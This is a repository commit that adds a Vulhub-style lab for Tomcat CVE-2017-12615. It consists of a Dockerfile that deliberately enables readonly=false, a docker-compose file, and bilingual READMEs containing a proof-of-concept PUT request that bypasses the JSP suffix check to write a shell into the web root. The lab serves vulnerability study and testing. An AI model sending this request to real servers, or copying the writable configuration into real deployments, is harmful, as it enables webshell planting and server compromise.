first commit
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
This commit is contained in:
BIN
tomcat/CVE-2017-12615/01.png
Normal file
BIN
tomcat/CVE-2017-12615/01.png
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 17 KiB |
8
tomcat/CVE-2017-12615/Dockerfile
Normal file
8
tomcat/CVE-2017-12615/Dockerfile
Normal file
@@ -0,0 +1,8 @@
|
||||
FROM vulhub/tomcat:8.5.19
|
||||
|
||||
LABEL maintainer="phithon <root@leavesongs.com>"
|
||||
|
||||
RUN cd /usr/local/tomcat/conf \
|
||||
&& LINE=$(nl -ba web.xml | grep '<load-on-startup>1' | awk '{print $1}') \
|
||||
&& ADDON="<init-param><param-name>readonly</param-name><param-value>false</param-value></init-param>" \
|
||||
&& sed -i "$LINE i $ADDON" web.xml
|
||||
67
tomcat/CVE-2017-12615/README.md
Normal file
67
tomcat/CVE-2017-12615/README.md
Normal file
@@ -0,0 +1,67 @@
|
||||
# Tomcat Arbitrary Write-file Vulnerability through PUT Method (CVE-2017-12615)
|
||||
|
||||
[中文版本(Chinese version)](README.zh-cn.md)
|
||||
|
||||
Tomcat version: 8.5.19
|
||||
|
||||
## Environment Setup
|
||||
|
||||
```
|
||||
docker compose build
|
||||
docker compose up -d
|
||||
```
|
||||
|
||||
After successfully running the commands above, you will see the example page of Tomcat through visiting the site `http://your-ip:8080`.
|
||||
|
||||
## Rationale
|
||||
|
||||
Reference links:
|
||||
|
||||
- http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0107097.html
|
||||
- https://mp.weixin.qq.com/s?__biz=MzI1NDg4MTIxMw==&mid=2247483659&idx=1&sn=c23b3a3b3b43d70999bdbe644e79f7e5
|
||||
- https://mp.weixin.qq.com/s?__biz=MzU3ODAyMjg4OQ==&mid=2247483805&idx=1&sn=503a3e29165d57d3c20ced671761bb5e
|
||||
|
||||
Tomcat sets up the write permission(readonly=false), which leads to the result that we can write files into the server.
|
||||
|
||||
```
|
||||
<servlet>
|
||||
<servlet-name>default</servlet-name>
|
||||
<servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
|
||||
<init-param>
|
||||
<param-name>debug</param-name>
|
||||
<param-value>0</param-value>
|
||||
</init-param>
|
||||
<init-param>
|
||||
<param-name>listings</param-name>
|
||||
<param-value>false</param-value>
|
||||
</init-param>
|
||||
<init-param>
|
||||
<param-name>readonly</param-name>
|
||||
<param-value>false</param-value>
|
||||
</init-param>
|
||||
<load-on-startup>1</load-on-startup>
|
||||
</servlet>
|
||||
```
|
||||
|
||||
Although Tomcat checks the file suffix to some extent(can't write jsp directly), we can still bypass the limitation through some file system features(such as using `/` in Linux).
|
||||
|
||||
## POC
|
||||
|
||||
Send the following packets directly and then the shell will be written into the Web root directory.
|
||||
|
||||
```
|
||||
PUT /1.jsp/ HTTP/1.1
|
||||
Host: your-ip:8080
|
||||
Accept: */*
|
||||
Accept-Language: en
|
||||
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
|
||||
Connection: close
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 5
|
||||
|
||||
shell
|
||||
```
|
||||
|
||||
As follows:
|
||||
|
||||
|
||||
65
tomcat/CVE-2017-12615/README.zh-cn.md
Normal file
65
tomcat/CVE-2017-12615/README.zh-cn.md
Normal file
@@ -0,0 +1,65 @@
|
||||
# Tomcat PUT方法任意写文件漏洞(CVE-2017-12615)
|
||||
|
||||
Tomcat版本:8.5.19
|
||||
|
||||
## 环境搭建
|
||||
|
||||
```
|
||||
docker compose build
|
||||
docker compose up -d
|
||||
```
|
||||
|
||||
运行完成后访问`http://your-ip:8080`即可看到Tomcat的Example页面。
|
||||
|
||||
## 漏洞原理
|
||||
|
||||
参考:
|
||||
|
||||
- http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0107097.html
|
||||
- https://mp.weixin.qq.com/s?__biz=MzI1NDg4MTIxMw==&mid=2247483659&idx=1&sn=c23b3a3b3b43d70999bdbe644e79f7e5
|
||||
- https://mp.weixin.qq.com/s?__biz=MzU3ODAyMjg4OQ==&mid=2247483805&idx=1&sn=503a3e29165d57d3c20ced671761bb5e
|
||||
|
||||
漏洞本质Tomcat配置了可写(readonly=false),导致我们可以往服务器写文件:
|
||||
|
||||
```
|
||||
<servlet>
|
||||
<servlet-name>default</servlet-name>
|
||||
<servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
|
||||
<init-param>
|
||||
<param-name>debug</param-name>
|
||||
<param-value>0</param-value>
|
||||
</init-param>
|
||||
<init-param>
|
||||
<param-name>listings</param-name>
|
||||
<param-value>false</param-value>
|
||||
</init-param>
|
||||
<init-param>
|
||||
<param-name>readonly</param-name>
|
||||
<param-value>false</param-value>
|
||||
</init-param>
|
||||
<load-on-startup>1</load-on-startup>
|
||||
</servlet>
|
||||
```
|
||||
|
||||
虽然Tomcat对文件后缀有一定检测(不能直接写jsp),但我们使用一些文件系统的特性(如Linux下可用`/`)来绕过了限制。
|
||||
|
||||
## 漏洞复现
|
||||
|
||||
直接发送以下数据包即可在Web根目录写入shell:
|
||||
|
||||
```
|
||||
PUT /1.jsp/ HTTP/1.1
|
||||
Host: your-ip:8080
|
||||
Accept: */*
|
||||
Accept-Language: en
|
||||
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
|
||||
Connection: close
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 5
|
||||
|
||||
shell
|
||||
```
|
||||
|
||||
如下:
|
||||
|
||||
|
||||
6
tomcat/CVE-2017-12615/docker-compose.yml
Normal file
6
tomcat/CVE-2017-12615/docker-compose.yml
Normal file
@@ -0,0 +1,6 @@
|
||||
version: '2'
|
||||
services:
|
||||
tomcat:
|
||||
build: .
|
||||
ports:
|
||||
- "8080:8080"
|
||||
Reference in New Issue
Block a user